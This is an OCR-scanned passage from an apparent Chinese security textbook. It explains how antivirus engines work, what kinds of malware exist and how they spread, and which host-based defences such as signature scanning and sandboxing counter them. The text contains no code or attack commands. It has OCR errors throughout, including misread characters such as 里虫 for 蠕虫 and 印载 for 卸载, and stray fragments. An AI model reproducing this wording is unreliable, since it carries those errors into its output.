伊 木 马 和 其 他 恶意 软件 的 查 杀 程序 ， 入 侵 预防 系统 等 ) 的 重要 组 成 部 分 。 


1. 杀毒 软件 引擎 的 行为 标准 


杀毒 软件 的 核心 组 件 是 其 杀毒 引擎 ， 杀 毒 引擎 是 一 套 判 断 特定 程序 行为 是 否 为 病毒 程 
序 (包括 可 疑 的 ) 的 技术 机 制 。 一 个 完整 的 技术 引擎 遵守 如 下 的 行为 过 程 。 

(1) 非 自身 程序 行为 的 程序 行为 捕获 。 

包括 来 自 于 内 存 的 程序 运行 ， 来 自 于 给 定 文件 的 行为 虚拟 判断 ， 来 自 于 网 络 的 动态 的 
信息 等 。 一 般 情况 下 ， 我 们 称 之 为 引擎 前 端 。 其 捕捉 的 方法 非常 多 ， 除 Norton 以 外 的 杀 
毒 软件 一 般 采 用 的 都 是 行为 规范 代码 化 的 方法 。 而 Norton 由 于 与 微软 有 远 远 好 于 其 他 厂 
商 的 合作 关系 ， 其 实现 过 程 比较 独特 。 

(2) 基于 引擎 机 制 的 规则 判断 。 

这 个 环节 代表 了 杀毒 引擎 的 质量 水 平 ， 一 个 好 的 杀毒 引擎 应 该 能 在 这 个 环节 发 现 很 多 
或 者 称 之 为 相当 规模 的 病毒 行为 ， 从 而 避免 进入 下 一 个 判断 环节 。 传 统 的 反 病毒 软件 引擎 
使 用 的 是 基于 特征 码 的 静态 扫描 技术 ， 即 在 文件 中 寻找 特定 的 十 六 进 制 字符 串 ， 如 果 找 
到 ， 就 可 判定 文件 感染 了 某 种 病毒 。 但 这 种 方法 在 当今 病毒 技术 迅猛 发 展 的 形势 下 已 经 起 
不 到 很 好 的 作用 了 。 为 了 更 好 地 发 现 病毒 ， 相 继 开 发 了 所 谓 的 虚拟 机 、 实 时 监控 等 相关 技 
术 。 这 个 环节 被 叫做 杀毒 软件 引擎 工作 的 核心 层 。 

(3) 引擎 与 病毒 库 的 交互 作用 。 

这 个 过 程 往往 被 认为 是 收尾 阶段 ， 相 对 于 前 两 个 环节 ， 这 个 阶段 的 速度 是 非常 慢 的 ， 
杀毒 引擎 与 要 将 非 自身 程序 行为 过 程 转化 为 杀毒 软件 自身 可 识别 的 行为 标识 符 ( 包 括 静 态 
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代码 等 )， 然 后 与 病毒 库 中 所 存储 的 行为 信息 进行 对 应 ， 并 作出 相应 处 理 。 当 然 必 须 承 
认 ， 当 前 的 杀毒 软件 对 大 量 病毒 的 识别 都 是 在 这 个 阶段 完成 的 。 因 此 一 个 足够 庞大 的 病毒 
库 往 往 能 够 弥补 杀毒 软件 引擎 的 不 足 之 处 。 但 是 必须 意识 到 ， 如 果 在 核心 层 阶 段 就 可 以 结 
束 并 清除 病毒 程序 ， 那 么 杀毒 软件 的 工作 速度 将 会 大 幅 提升 。 


2. 杀毒 软件 引擎 的 实现 方式 


目前 ， 杀毒 引 擎 的 主流 实现 方式 有 以 下 几 种 : 虚拟 机 技术 、 实 时 监控 技术 、 智 能 码 标 
识 技术 、 行 为 拦截 技术 等 。 其 中 智能 码 标识 技术 和 行为 拦截 技术 是 近年 来 出 现 的 技术 ， 采 
用 智能 码 标识 技术 的 目的 是 提高 杀毒 速度 并 且 预 防 未 知 病毒 ， 而 行为 拦截 技术 也 是 一 种 预 
防 未 知 病毒 的 方法 ， 与 虚拟 机 技术 相似 ， 通 过 对 程序 行为 的 分 析 来 判断 其 是 否 为 病毒 。 

下 面 对 杀 毒 引 擎 最 主要 的 两 种 技术 一 一 虚拟 机 和 实时 监控 进行 具体 介绍 。 

1) ”虚拟 机 

虚拟 机 ， 在 反 病 毒 界 也 被 称 为 通用 解密 器 ， 已 经 成 为 反 病毒 软件 中 最 重要 的 组 成 部 分 
之 一 。 杀 毒 引 擎 中 的 虚拟 机 ， 和 那些 诸如 VMWare 的 “虚拟 机 ”是 不 同 的 。 查 毒 引擎 中 
的 虚拟 机 ， 可 以 为 待 查 的 可 执行 程序 创建 一 个 虚拟 的 执行 环境 ， 提 供 它 可 能 用 到 的 一 切 元 
素 ， 包 括 硬盘 、 端 口 等 ， 让 它 在 其 上 自由 发 挥 ， 最 后 根据 其 行为 来 判定 是 否 为 病毒 。 就 目 
前 而 言 ， 卡 巴 斯 基 在 这 方面 做 得 还 可 以 。 而 Mcafee 的 新 产品 中 ， 则 加 入 了 一 种 缓冲 区 溢 
出 保护 技术 ， 本 质 上 其 实 也 是 一 种 虚拟 技术 。 查 毒 引 擎 的 虚拟 机 是 一 个 软件 模拟 的 
CPU， 它 可 以 像 真正 的 CPU 一 样 取 值 、 译 码 、 执 行 ， 可 以 模拟 一 段 代码 在 真正 的 CPU 上 
运行 得 到 的 结果 。 给 定 一 组 机 器 码 序 列 ， 虚 拟 机 就 会 自动 从 中 取出 第 一 条 指令 操作 码 部 
分 ， 判 断 操作 码 类 型 和 寻 址 方式 以 确定 该 指令 长 度 ， 然 后 在 相应 的 函数 中 执行 该 指令 ， 并 
根据 执行 后 的 结果 确定 下 条 指令 的 位 置 ， 如 此 循环 反复 直到 某 个 特定 情况 发 生 以 结束 
王 作 s 

设计 虚拟 机 查 毒 的 目的 ， 就 是 为 了 对 付 加 密 变形 病毒 。 虚 拟 机 首先 从 文件 中 确定 并 读 
取 病 毒 入 口 处 代码 ， 然 后 以 上 述 工 作 步 又 解释 执行 病毒 头 部 的 解密 段 (Decryptor)， 最 后 在 
执行 完 的 结果 (解密 后 的 病毒 体 明文 ) 中 查找 病毒 的 特征 码 。 这 里 所 谓 的 “虚拟 ”， 并 非 是 
指 创 建 了 什么 虚拟 环境 ， 而 是 指 染 毒 文 件 并 没有 实际 执行 ， 只 不 过 是 虚拟 机 模拟 了 其 真实 
执行 时 的 效果 。 

早期 病毒 由 于 没有 使 用 任何 复杂 的 反 检 测 技术 ， 如 果 拿 反 汇编 工具 打开 病毒 体 代码 ， 
就 可 以 看 到 真正 的 机 器 码 。 因 而 可 以 由 病毒 体内 某 处 一 段 机 器 代码 和 此 处 距离 病毒 入 口 
(注意 不 是 文件 头 ) 偏 移 值 ， 来 唯一 确定 一 种 病毒 。 查 毒 时 ， 只 需 简 单 的 确定 病毒 入 口 并 在 
指定 偏 移 处 扫描 特定 代码 串 。 这 种 静态 扫描 技术 对 付 普 通病 毒 是 万 无 一 失 的 。 但 随 着 病毒 
技术 的 发 展 ， 出 现 了 一 类 加 密 病 毒 。 这 类 病毒 的 特点 是 : 其 入 口 处 具有 解密 段 
(Decryptor)， 而 病毒 主体 代码 被 加 了 密 。 运 行 时 首先 得 到 控制 权 的 解密 代码 将 对 病毒 主体 
进行 循环 解密 ， 完 成 后 将 控制 交 给 病毒 主体 运行 ， 病 毒 主体 感染 文件 时 会 将 解密 段 ， 用 随 
机 密 钥 加 密 过 的 病毒 主体 ， 和 保存 在 病毒 体内 或 嵌入 解密 段 中 的 密 钥 一 同 写 入 被 感染 文 
件 。 由 于 同一 种 病毒 的 不 同 传染 实例 的 病毒 主体 是 用 不 同 的 密 钥 进行 加 密 ， 因 而 不 可 能 在 
其 中 找到 唯一 的 一 段 代码 串 和 偏 移 来 代表 此 病毒 的 特征 ， 似 乎 静态 扫描 技术 对 此 即将 失 
效 。 但 是 ， 因 为 不 同 传染 实例 的 解密 段 仍 保持 不 变 机 器 码 明文 ， 所 以 如 果 应 用 特征 码 查 毒 
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技术 ， 虽 然 有 一 定 的 误 报 风险 (解密 段 中 代码 缺少 病毒 特性 ， 同 样 的 特征 码 也 会 出 现在 正 
常 程序 中 )， 但 仍 不 失 为 一 种 有 效 的 方法 。 

由 于 加 密 病 毒 还 没有 能 够 完全 逃脱 静态 特征 码 扫 描 ， 所 以 病毒 写作 者 在 加 密 病 毒 的 基 
础 之 上 进行 改进 ， 使 解密 段 的 代码 对 不 同 传染 实例 呈现 出 多 样 性 ， 这 就 出 现 了 加 密 变 形 病 
毒 。 它 和 加 密 病 毒 非常 类 似 ， 唯 一 的 改进 在 于 病毒 主体 在 感染 不 同文 件 会 构造 出 一 个 功能 
相同 但 代码 不 同 的 解密 段 ， 也 就 是 不 同 传染 实例 的 解密 段 具有 相同 的 解密 功能 但 代码 却 截 
然 不 同 。 比 如 ， 原 本 一 条 指令 完全 可 以 拆 成 几 条 来 完成 ， 中 间 可 能 会 被 插入 无 用 的 LJ 代 
码 。 这 样 ， 由 于 无 法 找到 不 变 的 特征 码 ， 静 态 扫描 技术 就 彻底 失效 了 。 在 这 种 情况 下 ， 虚 
拟 机 技术 将 会 派 上 用 场 。 

2) ”实时 监控 技术 

事实 上 ， 实 时 监控 技术 早 在 DOS 时 代 就 出 现 了 。 但 是 在 Windows 下 要 实现 实时 监控 
绝 非 易 事 ， 因 为 普通 用 户 态 程序 是 不 可 能 监控 系统 的 活动 的 ， 这 也 是 出 于 系统 安全 的 考 
虑 。 病 毒 实时 监控 普遍 使 用 了 驱动 编程 技术 ， 让 工作 于 系统 核心 态 的 驱动 程序 去 拦截 所 有 
的 文件 访问 。 当 然 由 于 工作 系统 的 不 同 ， 驱 动 程 序 无 论 从 结构 还 是 工作 原理 都 不 尽 相 同 
的 ， 当 然 程序 写法 和 编译 环境 更 是 千差万别 了 。 上 面 提 到 的 病毒 实时 监控 ， 实 质 就 是 对 文 
件 的 监控 。 除 了 文件 监控 外 ， 还 有 各 种 各 样 的 实时 监控 工具 ， 都 具有 各 自 不 同 的 特点 和 功 
用 。 现 在 流行 的 网 络 监控 ， 邮 件 监 控 基 本 上 都 是 对 文件 监控 的 改进 。 

病毒 的 实时 监控 ， 本 质 上 就 是 一 个 文件 监视 器 。 它 会 在 文件 打开 、 关 闭 、 清 除 、 写 入 
等 操作 时 检查 文件 是 否 是 病毒 携带 者 ， 如 果 是 则 根据 用 户 的 决定 选择 不 同 的 处 理 方案 ， 如 
清除 病毒 、 禁 止 访问 该 文件 、 删 除 该 文件 或 简单 地 忽略 。 这 样 就 可 以 有 效 地 避免 病毒 在 本 
地 机 器 上 的 感染 传播 ， 因 为 可 执行 文件 装 入 器 在 装 入 一 个 文件 执行 时 首先 会 要 求 打开 该 文 
件 ， 而 这 个 请 求 又 一 定 会 被 实时 监控 在 第 一 时 间 截 获 到 ， 它 确保 了 每 次 执行 的 都 是 干净 的 
不 带 毒 的 文件 从 而 不 给 病毒 以 任何 执行 和 发 作 的 机 会 。 


3. 最 新 的 云 杀 毒 技 术 


“ 云 安全 (Cloud Security)” 计 划 目 前 是 网 络 时 代 信 息 安全 的 最 新 体现 ， 它 融合 了 并 行 
处 理 、 网 格 计算 、 未 知 病毒 行为 判断 等 新 兴 技 术 和 概念 ， 通 过 网 状 的 大 量 客户 端 对 网 络 中 
软件 行为 的 异常 监测 ， 获 取 互 联网 中 木马 、 恶 意 程序 的 最 新 信息 ， 传 送 到 Server 端 进 行 自 
动 分 析 和 处 理 ， 再 把 病毒 和 木马 的 解决 方案 分 发 到 每 一 个 客户 端 。 

由 于 认识 到 传统 的 杀毒 软件 将 无 法 有 效 地 处 理 日 益 增多 的 恶意 程序 ， 来 自 互 联网 的 主 
要 威胁 将 由 单纯 的 计算 机 病毒 转向 恶意 程序 及 木马 型 混合 病毒 。 在 这 样 的 情况 下 ， 采 用 的 
特征 库 判 别 法 显然 已 经 过 时 。 云 安全 技术 应 用 后 ， 识 别 和 查 杀 病 毒 不 再 仅仅 依靠 本 地 硬盘 
中 的 病毒 库 ， 而 是 依靠 庞大 的 网 络 服务 ， 实 时 进行 采集 、 分 析 以 及 处 理 。 整 个 互联 网 就 是 
巨大 的 “杀毒 软件 ”， 参 与 者 越 多 ， 每 个 参与 者 就 越 安 全 ， 整 个 互联 网 就 会 更 安全 。 

目前 ， 瑞 星 、 趋 势 、 卡 巴 斯 基 、MCAFEE、SYMANTEC、 人 金山 、360 安全 卫士 等 杀 
毒 软件 厂商 都 推出 了 自己 的 云 安全 解决 方案 。 以 瑞星 基于 云 安全 策略 开发 的 杀毒 软件 为 
例 ， 其 每 天 拦截 的 木马 攻击 达 数 百 万 次 ， 甚 至 数 千 万 次 。 可 以 看 出 ，“ 云 杀毒 ”将 是 杀毒 
软件 的 最 新 发 展 趋势 。 
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8.4 恶意 软件 的 防护 和 查 杀 


目前 恶意 软件 的 数目 和 种 类 繁多 ， 因 此 很 难为 每 种 恶意 软件 类 别提 供 一 个 精准 的 定 
义 。 通 常情 况 下 ，“ 亚 意 软 件 ”被 用 作 一 个 集合 名 词 ， 以 指 代 故 意 在 计算 机 系统 上 执行 任 
何 恶 意 任务 的 病毒 、 里 虫 和 木马 程序 等 。 对 于 反 病 毒 工作 而 言 ， 可 将 恶意 软件 类 别 笼统 地 
定义 为 特洛伊 森马、 蠕虫 和 病毒 代码 等 的 集合 。 


8.4.1 恶意 软件 的 特征 和 分 类 
1. 恶意 软件 的 特征 


一 般 的， 恶意 软件 具有 以 下 显著 的 共同 特征 : 

e@ ”强制 安装 ， 指 未 明确 提示 用 户 或 未 经 用 户 许可 ， 就 在 用 户 计算 机 或 其 他 终端 上 安 
装 软 件 的 行为 。 

@ ”难以 卸载 ， 指 未 提供 通用 的 卸载 方式 ， 或 在 不 受 其 他 软件 影响 、 人 为 破坏 的 情况 
下 ， 印 载 后 仍然 有 活动 程序 的 行为 。 

e@ ”浏览 器 动 持 ， 指 未 经 用 户 许可 ， 修 改 用 户 浏览 器 或 其 他 相关 设置 ， 迫 使 用 户 访问 
特定 网 站 或 导致 用 户 无 法 正常 上 网 的 行为 。 

e@ ”未 经 许可 的 弹出 性 广告 ， 指 未 明确 提示 用 户 或 未 经 用 户 许可 ， 利 用 安装 在 用 户 计 
算 机 或 其 他 终端 上 的 软件 弹出 广告 的 行为 。 

@ ”恶意 收集 用 户 信息 ， 指 未 明确 提示 用 户 或 未 经 用 户 许可 ， 恶 意 收集 用 户 信 息 的 
行为 。 

e ”恶意 印 载 ， 指 未 明确 提示 用 户 ， 未 经 用 户 许可 ， 或 误导 、 欺 骗 用 户 介 载 其 他 软件 
的 行为 。 

e ”恶意 捆绑 ， 指 在 软件 中 捆绑 已 被 认定 为 恶意 软件 的 行为 。 

e@ ”其 他 侵害 用 户 的 恶意 行为 ， 例 如 侵害 用 户 软件 安装 、 使 用 和 印 载 知情 权 、 选 择 权 
的 恶意 行为 。 


2. 恶意 软件 的 分 类 


通过 以 上 特征 ， 我 们 可 以 知道 任何 专门 用 于 开发 在 没有 获得 用 户 许 可 的 情况 下 潜入 计 
算 机 或 者 给 计算 机 系统 造成 损害 的 软件 都 可 以 被 认为 是 恶意 软件 。 下 面 我 们 就 列举 目前 比 
较 流 行 的 几 种 不 同类 别 的 恶意 软件 。 

1) “计算 机 病毒 

计算 机 病毒 也 可 以 被 看 做 是 一 种 感染 计算 机 系统 的 恶意 软件 ， 但 它们 常 需要 一 些 其 他 
的 手段 提供 支持 。 一 个 真正 的 病毒 可 以 通过 某 种 形式 的 可 执行 代码 从 一 台 计 算 机 传播 到 另 
一 台 。 大 多 数 病毒 都 包括 以 下 三 个 方面 的 功能 : 

e@ ”复制 : 一 旦 宿主 程序 被 激活 ， 病 毒 和 病毒 恶意 代码 进行 的 第 一 个 操作 就 是 传播 。 

e@ 隐藏， 计算 机 病毒 可 以 采用 多 种 方法 隐藏 起 来 ， 以 防止 被 反 恶 意 软件 工具 发 觉 。 

e ”有 效 部 分 :对 于 病毒 来 说 恶意 代码 的 有 效 部 分 可 以 用 来 进行 任何 操作 ， 从 关闭 计 
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算 机 到 销毁 数据 都 是 可 以 实现 的 操作 。 

2) ”计算 机 蜂 虫 

与 传统 病毒 相 比 ， 计 算 机 蠕虫 要 复杂 得 多 。 蠕 虫 可 以 在 没有 经 过 用 户 许可 的 情况 下 进 

行 复制 。 如 果 恶 意 软件 想 利用 网 络 来 进行 传播 ， 其 借助 蠕虫 的 机 会 要 比 病毒 大 得 多 。 蜂 虫 

的 主要 组 成 部 分 是 : 

@ 入侵 工具 : 利用 受害 人 计算 机 的 漏洞 获取 进入 方式 的 恶意 代码 。 

@ ”安装 工具 : 入 侵 工具 让 计算 机 蠕虫 可 以 绕 过 系统 的 安全 防护 机 制 。 接 下 来 ， 安 装 

工具 就 接管 了 控制 权 ， 并 开始 将 恶意 代码 的 主体 传输 到 受害 的 计算 机 上 。 

@ 发现 工具 : 一 旦 安装 完毕 ， 蠕 虫 就 会 开始 使 用 几 种 不 同 的 方法 来 查找 网 络 上 的 其 
他 计算 机 ， 这 些 方 法 包括 了 寻找 电子 邮件 地 址 、 主 机 列表 以 及 进行 DNS 信息 查 
询 等 。 

e ”扫描 工具 : 蠕虫 利用 扫描 工具 来 确认 新 发 现 的 目标 计算 机 中 是 否 存在 可 以 被 入 侵 

工具 攻击 的 漏洞 。 

e@ “有 效 部 分 : 驻 留 在 每 个 受害 人 计算 机 上 的 恶意 代码 ， 可 以 利用 远程 连接 的 应 用 从 
日 志 记录 器 那里 获取 用 户 名 和 密码 。 

3) “未 知 的 后 门 软件 

其 实 后 门 软件 类 似 我 们 使 用 的 远程 访问 程序 ， 而 它们 之 所 以 被 当 作 恶意 软件 ， 是 因为 

后 门 软件 在 安装 的 时 候 没 有 得 到 使 用 者 的 允许 ， 同 时 其 运行 一 般 都 绕 过 了 用 户 正常 的 口令 

认证 程序 ， 已 达到 网 络 攻击 者 的 特定 目的 。 后 门 软件 通常 可 以 采用 两 种 安装 方式 : 一 种 是 

利用 目标 计算 机 上 的 漏洞 、 木 马 或 病毒 等 程序 安装 后 门 ， 另 一 种 方式 是 通过 社会 工程 的 方 

法 诱骗 用 户 ， 让 其 在 不 知情 的 环境 下 安装 后 门 软件 。 一 旦 安装 完成 ， 后 门 软件 就 可 以 让 攻 

击 者 通过 远程 访问 攻击 获得 计算 机 的 完全 控制 权 。 常 见 的 后 门 软件 包括 SubSeven、 

NetBus、 深 喉 (Deep Throat)、 Back Orifice 以 及 Bionet 等 。 通 常情 况 下 ， 包括 MBAM 和 

GMER 在 内 的 恶意 软件 扫描 工具 可 以 成 功 地 清除 后 门 软件 。 

4) ”特洛伊 木马 

木马 程序 一 般 从 表面 上 看 来 包含 了 有 用 或 好 的 功能 ， 但 实际 上 是 一 种 为 了 掩盖 其 恶意 

功能 的 程序 。 通 常 在 安装 时 ， 木 马 具 有 破坏 性 的 有 效 部 分 就 会 自动 运行 并 进行 伪装 ， 以 防 

止 反 恶 意 软件 工具 发 现 恶意 代码 的 存在 。 特 洛 伊 木马 经 常会 采用 以 下 技术 来 伪装 自己 。 

@ ” 重 命 名 : 恶意 软件 会 伪装 成 常见 的 文件 。 

e@ 暗中 破坏 : 当 系 统 中 已 经 存在 恶意 软件 的 话 ， 常 常会 破坏 反 恶 意 软件 工具 的 安装 
和 正常 工作 。 

@ ”多 态 代 码 : 对 代码 进行 多 态 变 换 可 以 让 恶意 软件 特征 码 的 更 新 速度 比 防 御 软件 的 
检索 速度 更 快 ， 以 达到 隐藏 自身 的 目的 。 例 如 “Vundo”， 它 就 可 以 欺骗 反 间 谍 
软件 ， 创 建 弹出 的 广告 窗口 ， 降 低 系 统 的 性 能 ， 并 干扰 网 页 浏览 活动 。 

5) ”广告 软件 /间谍 软件 

广告 软件 指 的 是 可 以 在 未 经 用 户 许可 的 情况 下 创建 弹出 广告 的 软件 。 通 常情 况 下 ， 广 

告 软件 是 作为 一 个 组 成 部 分 安装 在 免费 软件 中 的 。 除 了 对 用 户 造成 骚扰 以 外 ， 广 告 软件 还 

会 显著 降低 计算 机 的 性 能 。 而 间谍 软件 指 的 是 在 使 用 者 不 知情 的 情况 下 从 计算 机 上 收集 信 

息 的 软件 。 通 常 阅读 软件 的 用 户 协议 是 非常 重要 的 ， 就 是 因为 间谍 软件 经 常 使 用 自由 软件 
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作为 有 效 载体 。 大 部 分 反 间 谍 软 件 都 可 以 从 计算 机 中 快速 找 出 未 经 许可 的 广告 软件 /间谍 
软件 ， 并 将 它们 删除 。 定 期 删除 临时 文件 、Cookie 和 网 络 浏览 器 的 历史 记录 ， 对 网 络 浏览 
器 进行 预防 性 维护 。 
6) ”混合 恶意 软件 
为 了 提高 攻击 的 成 功率 ， 当 今 恶意 软件 开发 者 通常 会 采用 将 不 同类 型 恶意 软件 捆绑 到 
一 起 的 技术 来 设计 混合 恶意 软件 。rootkit 就 是 一 个 典型 的 例子 ， 通 常情 况 下 ，rootkit 会 和 
特洛伊 木马 封装 在 同一 个 载体 中 。 这 样 的 话 ， 在 使 用 的 时 候 ， 攻 击 者 就 可 以 远程 访问 计算 
机 ， 在 不 受 怀疑 的 情况 下 完成 整个 攻击 。rootkit 已 经 成 为 计算 机 面临 的 最 大 威胁 之 一 了 。 
rootkit 通常 包含 了 几 种 不 同 的 类 型 ， 但 目前 比较 流行 的 主要 是 三 种 类 型 ， 分 别 是 用 户 
模式 、 内 核 模 式 和 固件 rootkit。 
@ ”用 户 模式 的 rootkit: 在 用 户 模式 下 ， 代 码 通过 受 限 连接 进入 计算 机 ， 获 取 软 件 和 
硬件 资源 的 使 用 权限 。 通 常情 况 下 ， 计 算 机 上 的 大 部 分 代码 都 运行 在 用 户 模式 
下 。 由 于 采用 的 是 受 限 连接 ， 在 用 户 模式 下 造成 的 损害 是 可 以 恢复 的 。 用 户 模式 
的 rootkit 可 以 对 进程 、 文 件 、 系 统 驱动 程序 、 网 络 端口 甚至 系统 服务 进行 改 
动 。 但 是 用 户 模式 的 rootkit 需要 复制 文件 到 计算 机 的 硬盘 驱动 器 上 进行 安装 ， 
并 在 每 次 系统 启动 时 自动 加 载 。 
e@ ”内 核 模式 的 rootkit， 由 于 用 户 模式 的 rootkit 容易 被 发 现 和 清除 ，rootkit 设计 者 们 
变换 了 一 种 思路 ， 并 开发 出 内 核 模式 的 rootkit。 内 核 模式 意味 着 rootkit 和 操作 系 
统 以 及 rootkit 检测 软件 拥有 相同 的 权限 ， 因 为 在 内 核 模式 下 ， 代 码 已 经 可 以 不 
受 限 制 地 控制 计算 机 上 所 有 的 软件 和 硬件 资源 ， 这 让 rootkit 可 以 轻易 控制 操作 
系统 。 但 是 对 于 内 核 模式 的 rootkit 来 说 ， 不 稳定 性 是 一 个 缺点 ， 通 常情 况 下 ， 
它 会 经 常 导致 无 法 解释 的 崩溃 或 蓝屏 。 
@ 固件 rootkit， 由 于 rootkit 开发 者 了 解 了 将 恶意 代码 保存 在 固件 中 的 方法 ， 因 此 固 
件 rootkit 已 成 为 恶意 软件 混合 体 的 新 发 展 。 在 这 里 ， 固 件 指 的 是 从 微 处 理 器 代 
码 到 PCI 扩展 卡 固件 的 任何 部 分 。 在 这 种 模式 下 ， 当 计算 机 关闭 时 ，rootkit 会 将 
恶意 代码 写 入 某 个 指定 的 固件 。 而 当 重 新 启动 计算 机 时 ，rootkit 就 会 重新 安装 。 
这 样 即使 清理 软件 发 现 并 清除 了 固件 rootkit， 在 计算 机 下 次 启动 的 时 候 ， 固 件 
rootkit 也 会 重新 出 现 。 
7) ”恶意 移动 代码 
与 以 前 的 安装 方式 相 比 ， 恶 意 移动 代码 正 迅速 成 为 在 计算 机 上 安装 恶意 软件 的 最 有 效 
方式 。 移 动 代码 产生 的 主要 目的 是 提供 交互 内 容 ， 通 过 用 户 的 交互 动作 来 安装 恶意 代码 。 
移动 代码 的 例子 包括 了 JavaScript 脚本 、VBScript 脚本 、ActiveX 控件 以 及 Flash 插件 。 防 
范 恶 意 移动 代码 的 最 好 方法 是 确保 操作 系统 和 所 有 辅助 软件 的 及 时 更 新 。 


8.4.2 ”恶意 软件 的 传输 机 制 


恶意 软件 可 以 使 用 一 个 或 多 个 不 同 的 传输 机 制 在 计算 机 之 间 进 行 传播 和 复制 ， 常 见 的 
传输 机 制 有 以 下 几 种 。 

(1) 网 络 共享 。 由 于 在 网 络 共享 上 实现 的 安全 性 级 别 很 低 ， 因 此 恶意 软件 可 以 借 此 将 
恶意 软件 复制 到 大 量 与 网 络 连接 的 计算 机 上 。 
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(2) 网 络 扫描 。 恶 意 软件 的 编写 者 可 以 通过 扫描 网 络 ， 寻 找 带 有 漏洞 的 计算 机 系统 ， 
或 者 随意 选择 目标 IP 地 址 并 尝试 植 入 恶意 软件 。 例 如 ， 此 机 制 可 以 使 用 特定 的 网 络 端口 
将 数据 包 发 送 到 许多 人 P 地 址 ， 以 查找 容易 入 侵 的 计算 机 进行 攻击 。 

(3) 借助 P2P 网 络 。 由 于 目前 P2P 应 用 非常 丰富 ， 大 多 数 用 户 都 安装 了 不 同类 型 的 
P2P 应 用 程序 客户 端 组 件 。 并 且 为 了 突破 防火 墙 的 限制 ， 此 类 应 用 程序 会 使 用 一 个 可 以 通 
过 防火 墙 的 网 络 端口 ， 例 如 80 端口 。 这 样 应 用 程序 就 可 以 使 用 此 端口 通过 防火 墙 ， 并 直 
接 将 文件 从 一 台 计算 机 传输 到 另 一 台 。 恶 意 软 件 编写 者 可 以 直接 使 用 它们 提供 的 传输 机 
制 ， 将 受 感染 的 文件 传播 到 客户 端 硬盘 上 。 

(4) 邮件 程序 。 这 种 类 型 的 恶意 软件 通过 使 用 宿主 上 安装 的 邮件 软件 ， 或 使 用 其 自身 
的 内 置 简单 邮件 传输 协议 (SMTP) 引擎 ， 将 其 自身 作为 邮件 大 量 发 送 到 网 上 用 户 的 电子 
邮件 中 。 

(5) 远程 利用 。 恶 意 软 件 可 能 会 试图 利用 服务 或 应 用 程序 中 的 特定 安全 漏洞 来 进行 复 
制 ， 并 与 蠕虫 技术 相 结合 。 例 如 Slammer 蠕虫 就 是 利用 了 Microsoft SQL Server 2000 数据 
库 系统 中 的 一 个 漏洞 ， 通 过 产生 缓冲 区 溢出 ， 人 允许 一 部 分 系统 内 存 被 相关 代码 覆盖 。 


8.4.3 ”恶意 软件 防御 技术 
1. 基于 主机 的 恶意 代码 防护 技术 


基于 主机 的 恶意 代码 防御 技术 主要 有 : 误 用 检测 技术 、 权 限 控制 技术 和 完整 性 技术 。 

1) “ 误 用 检测 技术 

误 用 检测 技术 也 称 为 基于 特征 字 的 检测 。 它 是 目前 检测 恶意 代码 最 常用 的 技术 ， 主 要 
源 于 模式 匹配 的 思想 。 它 首先 根据 已 知 恶 意 代 码 的 特征 关键 字 建 立 一 个 恶意 代码 特征 库 ， 
然后 对 计算 机 程序 代码 进行 扫描 ， 并 与 特征 库 中 的 已 知 恶意 代码 关键 字 进 行 匹配 ， 从 而 判 
断 被 扫描 程序 是 否 感染 恶意 代码 。 

误 用 检测 分 为 静态 检测 和 动态 检测 。 静 态 检测 是 指 脱 机 对 计算 机 上 存储 的 所 有 代码 进 
行 扫描 ;而 动态 检测 则 是 指 实时 对 到 达 计 算 机 的 所 有 数据 进行 检查 扫描 ， 并 在 程序 运行 过 
程 中 对 内 存 中 的 代码 进行 扫描 检测 。 

基于 特征 字 的 恶意 代码 检测 技术 广泛 应 用 于 目前 的 反 病毒 软件 中 。 早 期 的 恶意 代码 主 
要 是 计算 机 病毒 ， 其 主要 感染 计算 机 文件 ， 并 在 感染 文件 后 留 有 该 病毒 的 特征 代码 。 通 过 
扫描 程序 文件 并 与 已 知 特征 值 相 匹配 即 可 快速 准确 地 判断 是 否 感染 病毒 ， 并 采取 对 应 的 措 
施 清 除 该 病毒 。 随 着 压缩 和 加 密 技术 的 广泛 采用 ， 在 进行 扫描 和 特征 值 匹配 前 ， 必 须 对 压 
缩 和 加 密 文件 先进 行 解 压 和 解密 ， 然 后 再 进行 扫描 。 而 压缩 和 加 密 方法 多 种 多 样 ， 这 就 大 
大 增加 了 查 毒 处 理 的 难度 ， 有 时 甚至 根本 不 能 检测 。 同 时 ， 基 于 特征 字 的 检测 方法 对 变形 
病毒 也 显得 力不从心 。 

2) ”权限 控制 技术 

首先 ， 恶 意 代码 要 实现 其 恶意 目的 必须 具备 足够 的 权限 。 因 此 恶意 代码 在 进入 系统 后 
必须 具有 相应 的 运行 权限 。 例 如 被 运行 的 恶意 代码 如 果 要 修改 、 破 坏 其 他 文件 ， 则 它 必须 
具有 对 该 文件 的 写 权限 ， 和 否则 会 被 系统 禁止 。 如 果 恶 意 代码 要 窃取 其 他 文件 信息 ， 它 也 必 
须 具 有 对 该 文件 的 读 权 限 。 总 之 ， 恶 意 代码 要 进行 任何 操作 都 必须 具备 相应 的 权限 。 因 
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此 ， 通 过 恰当 控制 计算 机 系统 中 程序 的 权限 ， 使 其 仅仅 具有 完成 正常 任务 的 最 小 权限 ， 那 
么 即使 该 程序 中 包含 恶意 代码 ， 该 恶意 代码 也 不 能 或 者 不 能 完全 实现 其 恶意 目的 ， 即 达到 
了 控制 恶意 代码 的 目的 。 

通过 权限 控制 来 防御 恶意 代码 的 技术 比较 典型 的 有 沙 箱 技术 和 安全 操作 系统 。 

(1) 沙 箱 技术 。 沙 箱 技术 是 指 系统 根据 每 个 应 用 程序 可 以 访问 的 资源 ， 以 及 系统 授权 
给 该 应 用 程序 的 权限 建立 一 个 属于 该 应 用 程序 的 “ 沙 箱 ”。 每 个 应 用 程序 都 运行 在 自己 受 
保护 的 “ 沙 箱 ” 之 中 ， 不 能 影响 其 他 程序 的 运行 ， 也 不 能 影响 操作 系统 的 正常 运行 。 并 
且 ， 操 作 系统 和 驱动 程序 也 运行 在 自己 的 “ 沙 箱 ” 中 。 另 外 ，Windows 也 提供 了 一 种 软件 
限制 策略 ， 它 允许 用 户 设 定 未 授权 应 用 程序 限制 运行 或 禁止 运行 ， 只 有 用 户 明确 授权 后 ， 
该 应 用 程序 才 可 以 运行 。 这 可 以 在 一 定 程度 上 防止 通过 电子 邮件 或 网 上 传播 的 恶意 代码 的 
攻击 。 这 种 限制 技术 也 是 一 种 沙 箱 技术 ， 它 只 允许 受信 任 的 程序 运行 ， 拒 绝 不 受信 任 的 恶 
意 代码 执行 。 

(2) 安全 操作 系统 。 由 于 恶意 代码 要 实现 成 功 入 侵 就 必须 获取 操作 系统 的 控制 权 ， 使 
